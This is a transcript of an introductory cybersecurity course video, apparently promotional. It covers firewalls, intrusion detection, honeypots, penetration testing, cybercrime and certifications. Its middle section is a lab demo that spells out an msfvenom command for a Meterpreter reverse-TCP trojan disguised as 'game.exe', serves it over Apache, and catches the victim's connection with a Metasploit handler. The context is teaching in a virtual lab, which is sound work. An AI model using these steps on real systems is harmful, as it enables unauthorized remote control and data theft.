certain amount of traffic to or from your computer so these are basically created to enhance the security posture of your network where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed now a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic you're going to configure the firewall by creating rules based on ip addresses port numbers protocols and what may and based on this the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules and if the traffic is allowed it will allow the traffic to go through if there's an explicit rule which says deny the traffic it will drop the packets or it will delete the package it will not allow the packets to go past it so if it is good traffic that means it matches a rule that has been created that allows the traffic to go through the firewall will allow it if it's bad traffic that means that there is a rule which denies the traffic to pass through it will get blocked at the firewall level itself it will the firewall will not allow it to enter the network similarly intrusion detection system it is designed to detect unauthorized access to systems or intrusion attempts as well now it works along with the firewall and the main thing is that here there's a database against which it can compare the traffic so most of the attacks that we've talked about there are some distinct signatures that would cause concern or that would highlight that kind of an attack most of the organizations try to develop these kind of signatures have them in a database and store them on the ids so that ideas can analyze the incoming traffic look at patterns from the traffic coming in or going out compared to the database of the signatures that it has and if it matches any of the signatures it will then detect that as an attack and send an alert to the administrator where the administrator will then have to manually come in and check it out an intrusion prevention system as described earlier or as mentioned earlier can be configured to react to that particular event so if it detects something that can be classified as an intrusion an administrator can pre-configure it to to react to that particular packet in a particular manner for example drop the packets or reflect them to a honey pot or want the administrator or do all of these things at the same time so as you can see on the diagram and the internet there's a hacker a sense of the data packets come in the firewall is not able to analyze the traffic because a firewall cannot analyze the contents of a packet it can only look at the header it can only look at the ip addressing and um the ports that are that have been created or the rules on which those things have been mentioned and then it allows the data to go through it reaches the ideas the ideas then looks at two ways to scan one is a signature that we've just spoken about where the developer of the ids creates those signatures and stores them onto the database or another thing that is known as heuristic scanning which is nothing but behavioral scanning so it looks at the behavior of the data and if the behavior looks malicious it will then raise an alert and warn the administrator then let's come to honeypots we just discussed in the previous slide that an ips or an intrusion prevention system can be pre-configured that if it detects an animally or if it detects an intrusion it may redirect the traffic to a honeypot what is a honeypot a honey pot is a decoy system it is created to showcase a certain set of vulnerabilities to try to attract the attention of a attacker now the word here is used as lure but it's more to deceive the attacker for example if the attacker has been able to bypass your firewall and your ideas and now can scan the entire subnet when they scan it they would come across a device which is pretty vulnerable or showcases some vulnerabilities which would definitely interest the hacker because they would think that it is a vulnerable server which contains some valuable data and that exactly what honeypot is it's a decoy server trying to uh trying to act as a production server trying to showcase that it has some valuable data but also has some vulnerabilities in it so that the attacker can be attracted towards it and spend some time trying to attack it or analyze the honeypot at the same time the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion which will give the administrator enough time to secure the rest of the network and we'll also get to analyze the logs of the honeypot one to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time let's talk about security testing security testing is nothing but a method which is carried out to identify threats and loopholes in a system so here we are going to do a vulnerability analyst and penetration test we may also go ahead and do a security audit so what is vulnerability scanning penetration testing and security auditing vulnerability scanning is the activity which you are conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure so it is a proactive way where a team of security experts will launch a vulnerability scanner scan certain devices that they have pre-identified and once the report from the vulnerability scanner comes in try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices this is obviously an ongoing process why because operating systems are patched upgraded new versions of softwares are released and we keep on upgrading and we keep on changing our id infrastructure ever so often and hence the id infrastructure i guess say is an ever evolving process and to be a priest of all the latest vulnerabilities and threats we need to do the vulnerability analysis in an ongoing manner to identify possible threats to the organization so then what is penetration testing vulnerability analysis is just identifying the vulnerabilities gaps misconfigurations that may be in the organization's infrastructure a penetration test is basically to validate whether those vulnerabilities that have been reported are real if yes how complex are they what would be the impact and what would be the technological impact and what kind of data would be compromised or what would be the end result of that attack if it actually happens in the real world so here a bunch of ethical hackers would simulate an attack from a hacker's perspective or from an insider's perspective a malicious outsider or a malicious insider depending on how they perceive the vulnerability as and then they will try to test the vulnerability to see how it can be exploited to what extent it can be exploited and what would be the compromise or what would be the data leakage that would happen if this vulnerability gets exploited so there are three ways a penetration test can be conducted there is a black box testing a gray box testing and a white box testing if you look at black box testing this is where the tester or the penetration tester rather has no knowledge about the organization their infrastructure applications or anything so this is where you're simulating a hacker who's sitting on the outside who has no knowledge about the organization so they start from the information gathering phase where they're going to try to figure out the ip addresses the ip ranges devices operating systems applications and anything and everything that the organization is going to use and then try to figure out vulnerabilities within them and then try to attack those vulnerabilities this is a very time consuming and a cost consuming audit the second one is a gray box testing audit where a partial knowledge is given to the penetration tester so this simulates a regular user kind of an attack so let's say if i'm a regular user in an organization and by when i say a regular user i'm saying i'm not an administrator so i have got limited access and based on that limited access and the limited knowledge that i can gather about the infrastructure by being a regular employee we are going to simulate a test with that knowledge to see whether a employee can take disadvantage of any vulnerabilities or and then try to worm their way into the organization's infrastructure and hack it the white box testing on the other hand is where we're looking at an insider a malicious insider who already has all the accesses who already has all the controls in his hand so simulating and administrative access and then trying to figure out whether this administrator can escalate their privileges and gain some other administrators access and try to then compromise data for example even if i'm saying i'm an administrator i am not the only administrator in the organization there would be backup administrators there would be system administrators there would be the active directory administrators there would be application administrators database administrators and so on so forth so every single component that we have may have a different administrator for example switches would have a different administrator same thing with firewalls or any other security controls that you have so if i am a administrator for backup can i then try to work my way out escalate my privileges as a regular administrator or a system administrator and then crack their passwords try to get access and manipulate some data so these are the three types of penetration testing audits that you will come across there would be some different subtypes but every organization can customize these kind of audits to whatever they require then we come to security auditing security auditing is nothing but an internal check that is carried out by internal auditors that means people who are employees within the organization to find out flaws in the organization's information system now this is more on the compliance side this may take inputs from the vulnerability assessment and the penetration test but overall we want to see what kind of policies that we have in our organization whether those policies are working properly whether they make sense are there any gaps and based on the technical inputs from the vapd team how do we map with the policies that we have defined for that organization for example a password policy now we have documented that the password policy should be effective enough that passwords cannot be easily brute forced so that's a high level policy then we dictate a procedure for that policy to be implemented where we say hey we want the systems to be configured where the password meets some complexity standards for example uh should be uppercase and lowercase a through z zero through nine should use special characters and should be randomized password should not be dictionary based or based on the user's name now these are this is the policy that we have created and the procedures that we have defined are they being actually implemented in the real world so a vulnerability analysis would determine whether the passwords are probably weak or not so if the vulnerability report comes back and says the passwords are probably weak then a penetration tester would go in and then try various attacks to see if passwords can be compromised and if yes they would then look at the complexity of the passwords compare it to the procedures and the policies and if they do not match that's where your security auditing comes into the picture so you're basically tying up the policy the procedures and the actual implementation that you have created in an organization now first and foremost what is cyber security there are three main pillars of cyber security that we deal with since the inception of computers and they're known as the confidentiality integrity and availability triad also known as cia not to be confused with the american intelligence agency but here we're looking at three different pillars where we want our data to remain confidential the integrity of the data to be intact and the data to be made available at all points in time so let's talk about these three aspects the principle of confidentiality asserts that the information and functions can be accessed only by authorized parties so for example even if you password protect your file what is it that you're trying to do you're trying to prevent other users accessing your data and peeping into your files so that your data remains confidential it is only shared with people who know the password integrity this is where the trustworthiness of that data comes into the picture where if the data is going to be changed for example you have a spreadsheet which has a lot of information about users and their login activities and whatnot and you want to ensure that that data is not modified by any unauthorized user so you're going to verify that the information is correct and is not modified by anybody who's unauthorized the availability part ensures that this data is made available to all authorized users when and where they want it right the principles of availability assert that in systems functions and data must be available on demand according to agreed upon parameters based on levels of service now this is where your service level agreement should come in for example when we log on to gmail we always assume that gmail is going to work and it's going to be available online at no point in time or very few times has it ever occurred that you've gone on to the internet typing gmail.com and the website is not available in fact if the website doesn't open we figure out the internet is not working right but gmail as a service is always made available now when we talk about threats to cia the confidentiality integrity and availability we talk about them in two different parameters cyber crime and hacking so what is cyber crime cyber crime is any criminal activity or any unauthorized activity that would involve the usage of any computing device which would result as a security incident at the victim's end most cyber crimes are carried out in order to profit from them criminals would try to do phishing attacks to steal your money out of your bank accounts or who try to con you into giving out your credentials thus compromising your email accounts or your social media accounts and try to gain access to your identity cyber crimes are generally carried out against computers or devices directly to damage or disable them spread malware secret and steal secret information etc so this talks about the motivation part of cyber crimes what would be the motivational aspect for a person to conduct such an activity right so basically to cause damage like wannacry happened in 2017 the perpetrators those those used wannacry probably gained a lot in the ransom that they demanded for that data to be decrypted but it also cost the world a lot of money in profits that were lost right let's move on to titling cybercrime so what what do we mean by cybercrime now again we if you remember a few slides back a few topics back we talked about information security and we talked about cyber security and we talked about the difference between both of them information security could be about anything normally contained within the organization the data that the organization has and us securing those data by introducing the security controls that we talked about cyber security would be something that is on the internet or on the web so any web application that i have deployed on the internet any databases that i have that would talk about cyber security so if your facebook account gets hacked or your onedrive gets hacked that's where cyber security comes into the picture but if your physical computer gets hacked because your password got cracked by a physical attack that's where your information security is so some of the basic ways of preventing cyber attacks on us use unique and strong passwords we've just discussed the complexity of the passwords we want to keep them random they should not be guessable they should not be based on dictionary words and they should be randomized in such a way that they cannot be predicted or guessed the length of the password should be very good should at least the minimum bare minimum should be eight characters even that is not suggested in today's world it has to be at least 12 to 16 characters an operating system i think in today's world will support up to 24 or 26 characters if you go into encryption softwares they support up to 60 odd characters of passwords so you want to keep those unique you want to recycle those passwords on a regular basis you do not want to reuse old passwords again and again avoid public wi-fi that's a must we always look for free wi-fi we go to coffee shops because they advertise free wi-fi that's now it nowadays a unique selling point uh for uh coffee shops and establishments and we go there we connect to the wi-fi because we get free internet and we get to serve whatever we want the problem is we have no idea who else is connected to that wi-fi and what kind of attacks they are creating we would discuss wi-fi attacks later on in one of the later videos where i can demonstrate how these attacks work but for now just remember that public wi-fi's are very uh risky and if your security is not up to the mark um you might just end up getting hacked like nobody's business ignore and delete mails from unknown senders phishing attacks very common attacks in today's world you get an email saying you've won a lottery or you've been chosen for something or please don't click here to download your free software and something like that and those emails are plenty nowadays i received an email yesterday where there was a nigerian prince who had died and he had left around 500 million dollars behind and there was this accountant who wanted to smuggle that money out and it was a huge email giving me all the details and out of seven billion people on this planet they identified my email address and they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes inheritance taxes and whatnot it was a ridiculous scheme i mean being chosen out of seven billion one out of seven billion um i mean our luck can't be that good can it so you have to be very about these attacks always ask the question if you want a lottery did you purchase the ticket no so there's never a free lunch right so always keep on questioning the things that you've been getting i'm not saying ignore them because some of them may actually come true there's always that one percent hope but always investigate those things to see whether they are spam if there is a fraud going on and if yes you yourself can uh communicate with the law enforcement agency and try to figure out uh who is responsible for that fraud make use of antivirus software and always keep it updated again uh let's not go for the free antivirus softwares because they have they may be good at detecting infections but when they come for the disinfecting those files then that's where they ask for money and that's when you're going to run around and say okay let me see which is the which is a very good antivirus to disinfect this kind of a infection so uh there are a lot of antiviruses out there i know that and it's very confusing which is the best one today now the problem is whichever is the best one in the market may not be the best one for the operating system that you're using for example i mean some uh there would be a good antivirus for windows 7 but the same antivirus installed on windows 8 or windows 10 wouldn't be that effective so always do an investigation the best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see the detection rate of that antivirus see how often does it detect the infections that you're looking at what you can do is you can head on to a website called virustotal.com that's v i r u s t o t a l dot com it's a google owned website they have around 60 to 70 odd scanners on that website most of the known antivirus scanners are there try to figure out uh try to see if you can get hold of an infected file be very careful you don't want to get infected yourself or i mean your computer you can upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses a few files a few infections over here and there and you will come to know which antiviruses would work for you use multi-factor authentication or two-step processes for authentication just don't rely on a username and password register devices get otps either on your email or on your devices and that gives you an added layer of security if your password gets compromised that's still okay because now the hacker will need to simulate your phone as well so that's added uh headaches and it may just not be worth it there are so many other people who don't use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced and be very careful when you're downloading apps now when we say applications on your mobile phones as well as in your computers on your mobile phone you still have a certain level of security where you can go to the apple marketplace or whatever it is called the google marketplace or whatever it is called and they do have some level of control but when you talk about windows operating systems and you're going on to the open internet to look for different kinds of softwares you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with a malware on that particular file that you're downloading especially if you're downloading a pirated program never download a pirated program so be very careful when you're downloading apps uh when you're downloading an executable file you can upload it to virustotal.exe scan it to see if there any viruses or malwares within it the website also helps you analyze urls to see if the url itself may have any malicious attacks within them embedded scripts or redirected scripts or things like that so you can use those that website uh to scan for scan the apps that you're downloading and see if there is anything malicious about those apps moving on to cybercrime statistics now this is going to be interesting let's talk about how these things uh and the percentile of these things in today's world by 2020 we would have generated 300 billion passwords now the human population on this planet is 7 billion imagine 7 billion having 300 billion passwords and i think half half the population wouldn't have access to computers or the internet either so imagine the number of passwords that we have and that's what makes us use easy passwords makes us repeat those passwords and makes and we use a single password for multiple accounts right because there are just so many passwords that we have to remember but that's the way it is and if we want to keep ourselves secure we are responsible for it so please be very careful with those passwords 24 000 malicious mobile apps blocked daily in fact the latest example that i can give give you i use an android phone and there's an application that i've always used called cam scanner and recently just three days back my mobile phone started telling me that it is a malicious app right i've been using it for years now probably three or four years maybe more what is the software you can click pictures of a document it will automatically convert it it will it will beautify it if that's a word convert it into a pdf and i can then send it as an attachment via email a very handy app for me or was an handy app for me it worked beautifully but three days back suddenly uh the android operating system and my antivirus on my android phone started reporting it as a malicious software so i went online and i checked into it and it seemed that over a period of time the developers changed their vision of that software made it spyware and then there was a dropper involved within that application which would then download a malware from a third-party server install it and start spying on you and start showing you malicious advertisements right so this was an existing app which was trusted over a period of years and over a period of time slowly they modified it into a spyware kaspersky was an organization that detected it in the first place and then pointed it out to google google took it off the google play market and now there is a variant of it available but if you look at the reviews all of them are one stars where they have identified that this is a malware now and it spies on them and it actually compromised some people's data so that's the latest example in 2017 or 18 there were 700 000 apps during that year that were identified by google as malicious apps and were deleted from google play so even if they're published there will be thousands of people who will download it till the time google realizes that it is a malware and then deletes it till then you've already been compromised and there is no way to protect yourself now so be very careful when you download these applications in the healthcare sector ransomware attacks will quadruple now the healthcare sector is a very volatile sector it contains a lot of private and sensitive information health information about individuals that can be misused by a lot of organizations advertisements pharmaceutical organizations life insurance people and whatnot right so these became very lucrative targets for hackers where if they can steal the database and sell it on the black market they will earn a lot of money ransomwares would basically work the other way around they encrypt the data at the hospital side and then they will hold the hospital ransom to pay up now you know how hospitals earn nowadays right so that's a lot of money that you're looking at cyber crime would cost up to six trillion dollars in 2021 6 trillion dollars just for cyber crime we are not talking about the income from the iit industry we are talking about how much money we will lose to cyber crime because of the various attacks that we that would be created 90 percent of hackers use encryption not only encryption most of that once hackers will try to hide their identity by spoofing their ip addresses mac addresses locations they will use encryption and cryptography to hide their malicious softwares to fool the antiviruses ideas ips's and it would it is a very difficult task to even identify a particular malware analyze it and then do a root cause analysis and try to figure out who the responsible hacker was so it's a very intensive task of doing such things and most of the hackers would go scot-free because it is very difficult to identify them now let's move on to the demo it's a very interesting demo you're using metasploit which is a penetration testing tool and if you're going to use a demo of using metasploit you're going to try to compromise the security of a particular system well let's discuss the demo before we start executing it so what we have done here is that we have two virtual machines on vmware workstation one is the kali linux machine and the other is a windows 7 machine what we are going to do is we are going to use a penetration testing tool called metasploit which is available freely on kali linux and we are going to use a particular payload generator on metasploit called msfv venom and using msf venom we are going to create a back door a executable file which will contain a trojan or a backdoor and we are going to try to infect that to the windows machine and see what happens when the victim executes that particular file now we're going to keep it at the basic level we're just going to create the trojan and then we're going to execute it in a later lecture or in a later video we'll see how we can mask that trojan into a legitimate looking application so that a victim can be fooled by the application that we're going to execute so let's start with the demo all right so this is the kali linux vm and the other machine is a windows 7 virtual machine so what we are going to do is on the kali linux machine we are going to just open up a command prompt right it's just regular command prompt your regular commands and uh what we are going to do is we are going to use the msf venom payload generator from metasploit to create a game.exe file now the trojan is will be contained within the game.exe so the command goes as such msf venom hyphen p for platform we want it or rather payload at this point in time we want the payload to be windows meetup reader reverse underscore tcp lhost and ip address for the localhost i'll explain the command once i've typed it let's just check what our ip address for this machine is and we have 192 168 71.133 and that's what we're going to type in here 192 168 71.133 l port 444 hyphen f exe hyphen a x 86 and we want that output in root desktop and we want it as game dot exe so let's go through the command the msf venom is the initiator command it invokes the payload generator in metasploit hyphen p is the payload we want windows meterpreter reverse tcp so what is the reverse tcp here the meter reader allows us for remote code execution where we are going to create the payload we are going to execute the payload at the victims and and the payload will then generate a connection back to us us bring the hackers machine and thus the local host which is the ip address of this machine which is the hacker's machine that we're using right now which is 192.168.71.133 that's why we have typed in the local host and l port is the local port on which port do we want to listen in or we want the payload to connect to the local host so what we are doing is the meter printer allows us remote code execution we create the game.exe we execute it at the victim's end it is pre-coded to connect to a local host the ip address is coded over there to a particular port which in this case is 444. you can put in any port number you want just ensure that the port is going to be free and it is not a regularly used port otherwise you're going to get problems over there so at this point in time you're going to keep it as 444. hyphen f stands for function we got an executable file hyphen a stands for the architecture here the architecture is 886 which is x86 which is 32 bit and we are going to export it and we are going to host it or we are going to create the file on root desktop and we are logged in as root as you can see at the prompt so when i press enter i should see a game.exe popping up right about here on my desktop if the command is correct which it should be and that's game.exe wait for it to be compiled properly so there you can see platform windows for payload no encoder a payload size 33 333 bytes and final size of executable file is seventy three thousand eight hundred and zero eight hundred and two bytes so now we have created game dot exe now we are not going to convert this into or you're not going to merge this into a malware and things like that we're going to keep it simple so to keep it simple what i'm going to do is as a hacker i'm going to host this on a server which is going to be on the same machine right so when we say we want to host an apache server the server is hosted in a directory called slash var bar slash www so let's go there present working directory uh we can see that we are in root cd where w and there we are cd html and that is where our web servers would be so what we are going to do is we are going to create a directory mkdir shared right to an ls and you can see the shared folder right here ls hyphen al will give you the list and the attributes and we can see these attributes we want to change these attributes so we are going to use a chmod recursive command give the permissions as 755 to the folder shared since we are in the same directory we do not need to give the path for shared let's just verify it and you can see the permissions being changed and now what we are going to do is we are going to change the ownership from root to www hyphen data for the web hosting so ch own for change ownership recursive www hyphen data to shared all right let's check if that's been done properly and you can see that earlier it was root root and now it is dub dub dub hyphen data www in data right and so that's the directory that's that we have created let's go back uh what we want to do is we want to copy game.exe into this folder so cp root desktop game dot exe var dub dub dub html shared and cd shared let's see we have game.exe right there there it is and now what we want to do is service apache to start so essentially what we have done is we have created a directory in the html folder to host this file and we've copied it from our desktop into the shared folder and i'm going to pause here for a minute all right so we have started the service for the apache 2 server that means we have started the web server we have hosted the game dot exe on the web server in the shared folder we have changed the permissions and the ownership for the shared folder now we are going to go on to the windows 7 machine and we are going to open up the browser and see if the web server is now accessible so if you remember the ip address of that machine was 192.168.71.133 and we have it we were in the shared folder 92 168.71 shared and if this is done properly we should see the game.exe right here and once we click on it it's going to ask us whether we want to save the file 72.1 kb we're going to save it and i'm going to save it on i think it just saved it here and now before we execute it we're going to go back into kali line next and we are now going to start the listener right so if you have created the exploit you created the payload rather we have hosted it onto a web server which means that when somebody double clicks on it the machine is going to try to create a reverse connection to our hacker's machine but our hacker's machine needs to be configured to handle that incoming connection so we are going to start off with msf console now msf console is the command which starts up metasploit right so we're just going to take a minute over here uh you can see it's metasploit framework control it's going to start it's does take a little bit of a while and we're just going to wait it out let me turn this into full screen i can see at the bottom left here on msf con on the msf prompt we are using metasploit with 1 699 exploits now this is not a completely updated version the latest one would have around 1800 exploits but the one that we want is uh excess in this version so there we are good to go so we start off with the configuration of metasploit to listen in on to that particular connection so we say use exploit multi handler and when you say multi multi is basically something that affects multiple operating system and we're going to use that exploit you can see it's now opening up the handler which we need to configure and here we're going to set the payload that it is going to expect the payload being windows meter preter reverse underscore tcp you can see that the payload has been configured we are going to say show options and you'll see it is going to ask us options uh for the payload which means the localhost the listen address and the listing port now you can see we had by default given 444 which is the default port for this exploit within metasploit if you want to change if you have changed the port when you created game.exe you need to change the port over here as well and the commands here that says set lhost equals 192.168.71.133 enter and i think i did a typo so uh there's no equal to that's it and you can see now it shows the equal to mark and we have now set the localhost if we want to set the l port that's how we do it we had 444 and there it is so if you have changed the port in the game.exe ensure that you change the port here as well show options and you'll see now the data is populated over here l host which is the local host is 192.168.71.133 and l port the local port is 444. we have configured this and now what we're going to do is we're just going to type in exploit and now you can see that it has started the reverse tcp handler on 190 to 168 71.133 on port 444 so now when the victim which is windows 7 executes the file and we say run at the victim's end there's nothing that should happen uh it's just uh resolving something and at the other end you can see that a meetup reader station has been opened and it shows us that from the victim's ip which is 71.129 on port 49493 we are connected to our machine so that's that's the connection that has happened press enter and you can see it exists exits the session let's just look at the ip address on windows to confirm that was the same machine that we had and that's 129 right there it is let's open up this file again and see what happens and you can see the second session being opened up right here do a pwd and you can see that we were connected to that particular website right so that's what uh this trojans are supposed to do give us a door entry and we then are able to connect and we are able to copy data and we are able to basically we have a back door so we can do anything and everything that we want to do let's see how do we become a cyber security expert so essentially who is a cyber security expert a cyber security expert is an individual employed by an organization to protect their infrastructure right so this person is responsible to identify potential flaws identify what threats the organization faces and then streamline or create or design or architect methodology which is going to protect all the assets that the organization has so this is going to happen through a variety of techniques such as finding weaknesses so vulnerability management where you run vulnerability scanners identify potential flaws in uh the organization's infrastructure could be applications could be servers could be desktops could be operating systems uh could be anything could be network-based flaws as well and then you're going to monitor these systems you're going to look at the data flow that is going to the internet through the network to the intranet rather and then you're going to check if there is anything malicious going on in that network so over these techniques you're basically going to monitor it on a day-to-day basis on a regular basis and you're going to try to identify if anything out of the ordinary is happening right after you find the weakness you're going to test those weaknesses to identify the complexity of those weakness to validate those weakness actually exist and then you're going to repair them you're going to patch them you're going to install updates or you're going to prevent you're going to install mechanisms like firewalls or antiviruses to mitigate those weaknesses and you're going to thus resulting in strengthening the areas where an attack may have occurred let's see the domains in cyber security now when we say domains in cyber security in the previous slide we were discussing where these attacks may happen like applications infrastructure network so let's see these domains in details asset security now when we say assets assets could be applications could be networking devices could be computers could uh could be routers it could be wireless access points uh and these uh all these devices have their own operating systems they have their own functionality and it is important that we look at the security of each and every asset that the organization owns security architecture and engineering now not everyone can just walk in an organization and then say let's start implementing as in implementing security in a particular manner we have to standardize the security in such a way where the security is constant for a long period of time and is consistent right so for that to happen there is an architecture an engineering phase where we are going to create a plan of how the security needs to be implemented for example if i determine to install a particular antivirus i have to ensure that the same antivirus is installed on all the systems in the organization i cannot have different kind of antiviruses installed that do not talk to each other or do not report properly to the proper owner so we have to create policies procedures and we have to implement them in a standardized manner for our security to work properly communication and network security now with cloud computing coming in and hybrid clouds happening where you got a deployment of a physical infrastructure talking to something that is on the cloud let's say aws or microsoft azure right and data flows are happening globally these days uh you have to be very careful how these data are going to be transmitted across the network thus you have to create those paths and ensure that those parts are monitored properly are regulated properly and do not have any data leakages similarly identity and access management who is accessing my data are they authorized to access my data and if yes how am i going to authenticate them how am i going to track them home how am i going to hold them accountable for whatever they have done even if a person is authorized to do something we have to hold them accountable for that activity so that if something something happens later on we can identify who made that change so the identity and access management module will consist of us creating groups policies users roles and interlinking them with the assets to ensure that only authorized people are able to access those devices security operations on a day-to-day basis we need to monitor the security of the organization for example if today i start facing a denial of service attack or somebody starts a password attack on my organization where they're trying to crack somebody's password there should be some internal mechanisms that are in place which will try to identify these attacks one the appropriate administrator and that administrator will walk in and try to investigate that attack so day-to-day operations are a must security assessment and testing now that we are all have these mechanisms in place are they going to remain constant for the rest of our lives no i.t is a ever evolving scenario so we need to assess and test our security controls on a regular basis to ensure that there are no gaps left what i configured today may be irrelevant tomorrow so i have to constantly keep on looking at the latest security trends the latest vulnerabilities that are being identified the patches that are being installed and i have to compare my infrastructure to all of these to see that i am compliant with the latest security standards software development security so if you're an organization who's developing software and who's going to sell that software to end users security becomes a huge part because the end user or the buyer if it is an organization is going to ask what kind of security testing was done in the application so that brings us to a software development life cycle which a life cycle which talks about how you're going to create that code how you're going to test that code ensure that the code is secure enough so you need to follow secure coding practices and you're going to test the software over and over again till you're satisfied with the outcome and then security and risk management now uh when we come to risks risks are basically events that may occur compromising the security of an organization so it is very important that we identify these risks we map these risks we verify how that risk is going to impact the business and then try to figure out security controls to mitigate that risk or bring it down to manageable aspects so that's a lot of talk that's a lot of domains that's a lot of attacks that we have discussed now let's see what kind of courses and certifications are available for us to enhance our careers and address all of these domains all of these attacks so starting off from a technical perspective where we are going to look at ethical hacking or security where we are going to assess and do a liberty assessment and penetration test there are certifications from comptia like security plus or from ec council which is the certified ethical hacking training which basically allows us to become vulnerability assessment and penetration testing experts so we'll be technically be testing each and every device and trying to hack those devices to see if that vulnerability is real and what can be attained out of that vulnerability cissp is very high level uh is a very high level certification that normally is considered as a management level certification right so just to get certified yourself you need at least five years of experience in the iit security field uh this is where you get certified and you're basically a chief information security officer where you're going to develop policies procedures and security control mechanisms and you're going to standardize the security policy of the entire organization then you've got the cisa or also known as the csa certified information systems auditor it is from an organization called asaka it's more on the system side where you're going to audit systems and you're going to verify that they are adhering to the policies that you have implemented the cism or system is a certified information security manager this is again a project based oriented approach where you're going to manage the security of an organization and you're going to look at all the daily operations of the security operations center and you're going to maintain and manage all of those functions overall when we talked about risk assessment and risk strategy for that we've got the ca crisc which is a certified in risk and information systems control now for these certifications this is more on the business side of everything where you understand the business processes you understand the business requirements and based on those business requirements you compare the technical implementations of compute of computing powers that you have implemented and then you are going to compare how those technical aspects can be converted into a risk for example a vulnerability assessment identifies a possible sequel injection attack now technically it becomes technically it becomes a big risk however which system has been being affected if that system gets compromised what kind of losses is the organization looking at how much are they going to be what kind of losses the organization are looking at are they looking at lawsuits from their customers are they looking at penalties from regulatory authorities so that risk that uh implied risk that this if this uh vulnerability is hacked that is the aspect that you want to look at when you're looking at risk information uh and controls similarly you have ccsp this is a certified cloud security professional certification so this is especially for people who want to deal with the cloud uh let it be a public cloud a private cloud or a hybrid cloud this certification gives you an architectural overview over different aspects of cloud and how you want to implement security in a cloud-based scenario so simplylearn offers all of these certifications with trainings from certified professionals so there's a master's program from simplylearn which talks about becoming a security expert which includes all of these trainings once you have these kind of trainings and you get those certifications on your profile that's where you're basically a cyber solutions or cyber security expert and you'll be designing and developing security policies structures architectures for various organizations and helping them enhance the security of their infrastructure we humans are highly tech savvy in today's times with the extensive use of the internet and modern technologies there is a massive challenge in protecting all our digital data such as net banking information account credentials and medical reports to name a few have you heard about the deadly wannacry ransomware attack the attack happened in may 2017 in asia and then it spread across the world within a day more than 230 000 computers were infected across countries the wannacry cryptoworm encrypted the data and locked the users out of their systems for decryption of the data the users were asked for a ransom of 300 to 600 dollars in bitcoin the users who used the unsupported version of microsoft windows and those who hadn't installed the security update of april 2017 were targeted in this attack the wannacry attack took a toll on every sector top tier organizations like hitachi nissan and fedex had to put their businesses on hold as their systems were affected too now this is what you call a cyber attack to prevent such attacks cyber security is implemented we can define cybersecurity as the practice of protecting networks programs computer systems and their components from unauthorized digital attacks these illegal attacks are often referred to as hacking hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems this is a misconception that hacking is always wrong there are hackers who work with different motives let's have a look at three different types of hackers black hat hackers are individuals who illegally hack into a system for monetary gain on the contrary we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization this form of hacking is absolutely legal and ethical hence they are also often referred to as ethical hackers in addition to these hackers we also have the grey hat hackers as the name suggests the color gray is a blend of both white and black these hackers discover vulnerabilities in a system and report it to the system's owner which is a good act but they do this without seeking the owner's approval sometimes grey hat hackers also ask for money in return for the spotted vulnerabilities now that you have seen the different types of hackers let's understand more about the hacking that is legal and valid ethical hacking through an interesting story dan runs a trading company he does online training with the money his customers invest everything was going well and dan's business was booming until a hacker decided to hack the company's servers the hacker stole the credentials of various trading accounts he asked for a lump sum ransom in exchange for the stolen credentials dan took the hacker's words lightly and didn't pay the hacker as a result the hacker withdrew money from various customers accounts and dan was liable to pay back the customers dan lost a lot of money and also the trust of his customers after this incident dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his company he wished there was someone from his company who could have run a test attack to see how vulnerable systems were before the hacker penetrated into the network this was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his network before an outsider does to do this job he hired an ethical hacker john john was a skilled professional who worked precisely like a hacker in no time he spotted several vulnerabilities in dan's organization and closed all the loopholes hiring an ethical hacker helped dan protect his customers from further attacks in the future this in turn increased the company's productivity and guarded the company's reputation so now you know hacking is not always bad john in this scenario expose the vulnerabilities in the existing network and such hacking is known as ethical hacking ethical hacking is distributed into six different phases let us look at these phases step by step with respect to how john our ethical hacker will act before launching an attack the first step john takes is to gather all the necessary information about the organization's system that he intends to attack this step is called reconnaissance he uses tools like nmap and h-ping for this purpose john then tries to spot the vulnerabilities if any in the target system using tools like nmap and expose this is the scanning phase now that he has located the vulnerabilities he then tries to exploit them this step is known as gaining access after john makes his way through the organization's networks he tries to maintain his access for future attacks by installing back doors in the target system the metasploit tool helps him with this this phase is called maintaining access john is a brilliant hacker hence he tries his best not to leave any evidence of his attack this is the fifth phase clearing tracks we now have the last phase that is reported in this phase john documents a summary of his entire attack the vulnerabilities he spotted the tools he used and the success rate of the attack looking into the report dan is now able to take a call and see how to protect his organization from any external cyber attacks don't you all think john is an asset to any organization if you want to become an ethical hacker like john then there are a few skills that you need to acquire first and foremost you need to have a good knowledge of operating environments such as windows linux unix and macintosh you must have reasonably good knowledge of programming languages such as html php python sql and javascript networking is the base of ethical hacking hence you should be good at it ethical hackers should be well aware of security laws so that they don't misuse their skills finally you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like john few examples of ethical hacking certification are certified ethical hacker certification ceh comptia pentest plus and licensed penetration tester certification to name a few simply learn provides a cyber security expert masters program that will equip you with all the skills required by a cyber security expert you could have a look at it by clicking the link in the description the endless growth of technologies in this area is directly proportional to the number of cyber crimes cyber crimes are estimated to cost six trillion dollars in 2021 hence to tackle these cyber crimes organizations are continuously on the lookout for cyber security professionals the average annual salary of a certified ethical hacker is 91 thousand dollars in the us and approximately rupees seven lakhs in india so what are you waiting for get certified and become an ethical hacker like john and put an end to the cyber attacks in the world so let's talk about hacking and what exactly hacking is hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems now here there are some keywords that we need to understand first and foremost exploit when you are exploiting weaknesses weaknesses are technically called vulnerabilities which are basically design flaws misconfiguration errors usage of default usernames and passwords which have not been modified so any 